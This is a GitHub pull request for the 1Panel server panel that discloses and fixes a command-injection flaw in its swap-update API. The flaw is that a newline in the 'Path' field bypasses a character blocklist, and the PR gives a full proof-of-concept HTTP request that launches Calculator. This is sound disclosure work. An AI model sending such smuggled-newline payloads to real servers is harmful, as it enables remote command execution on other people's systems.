Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

fix: 解决命令注入waf被绕过的问题 #4131

Merged
merged 1 commit into from
Mar 8, 2024

Conversation

L1nyz-tel
Copy link
Contributor

author: https://github.com/l1nyz-tel/


backend/router/ro_toolbox.go#InitRouter 中的一处 /device/update/swap 路由对应的函数 baseApi.UpdateDeviceSwap 存在命令注入

func (b *BaseApi) UpdateDeviceSwap(c *gin.Context) {
	var req dto.SwapHelper
	if err := helper.CheckBindAndValidate(&req, c); err != nil {
		return
	}
	if err := deviceService.UpdateSwap(req); err != nil {
		helper.ErrorWithDetail(c, constant.CodeErrInternalServer, constant.ErrTypeInternalServer, err)
		return
	}

	helper.SuccessWithData(c, nil)
}

UpdateSwap 函数中调用了 cmd.Execf 有命令拼接,可以执行命令的,不过有一个 CheckIllegal 需要绕过

func (u *DeviceService) UpdateSwap(req dto.SwapHelper) error {
	if cmd.CheckIllegal(req.Path) {
		return buserr.New(constant.ErrCmdIllegal)
	}
	if !req.IsNew {
		std, err := cmd.Execf("%s swapoff %s", cmd.SudoHandleCmd(), req.Path)
		if err != nil {
			return fmt.Errorf("handle swapoff %s failed, err: %s", req.Path, std)
		}
	}
    ......

查看 CheckIllegal 代码,直接是对关键字符进行判断的

绕过方式: \n 换行执行一条新的命令

func CheckIllegal(args ...string) bool {
	if args == nil {
		return false
	}
	for _, arg := range args {
		if strings.Contains(arg, "&") || strings.Contains(arg, "|") || strings.Contains(arg, ";") ||
			strings.Contains(arg, "$") || strings.Contains(arg, "'") || strings.Contains(arg, "`") ||
			strings.Contains(arg, "(") || strings.Contains(arg, ")") || strings.Contains(arg, "\"") {
			return true
		}
	}
	return false
}

数据包如下
==在 \n 之后执行任意系统命令==

POST http://127.0.0.1:9999/api/v1/toolbox/device/update/swap HTTP/1.1
Host: 127.0.0.1:9999
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: application/json, text/plain, */*
Accept-Language: zh
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:9999/containers/container
Accept-Encoding: gzip, deflate
Cookie: psession=b10c76ce-5502-48b1-8705-eca3d390ee61
Connection: close
Content-Type: application/json
Content-Length: 40

{"Path":"123123123\nopen -a Calculator"}

Copy link

f2c-ci-robot bot commented Mar 8, 2024

Adding the "do-not-merge/release-note-label-needed" label because no release-note block was detected, please follow our release note process to remove it.

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

Copy link

f2c-ci-robot bot commented Mar 8, 2024

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by:
Once this PR has been reviewed and has the lgtm label, please assign wangdan-fit2cloud for approval. For more information see the Kubernetes Code Review Process.

The full list of commands accepted by this bot can be found here.

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@wanghe-fit2cloud
Copy link
Member

感谢支持。

@wanghe-fit2cloud wanghe-fit2cloud merged commit ba63907 into 1Panel-dev:dev Mar 8, 2024
1 check was pending
KaySar12 pushed a commit to KaySar12/1Panel that referenced this pull request Oct 17, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants